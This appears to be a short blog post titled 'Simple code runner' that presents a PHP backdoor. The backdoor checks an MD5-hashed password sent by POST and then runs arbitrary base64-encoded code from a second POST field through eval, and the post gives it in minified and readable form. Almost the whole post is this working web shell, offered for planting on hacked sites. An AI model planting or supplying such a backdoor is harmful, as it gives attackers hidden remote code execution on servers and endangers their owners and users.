There is nothing to add, the hacked send the activating password in $_POST[“password”], and the malicious code in $_POST[“cide”]
<?php if(md5($_POST["password"])=="6e2754906bd66dc7c229537fba4cfb61"){eval(base64_decode($_POST["code"]));} ?>
The readable code:
<?php if (md5($_POST["password"]) == "6e2754906bd66dc7c229537fba4cfb61") { eval(base64_decode($_POST["code"])); } ?>
One thought on “Simple code runner”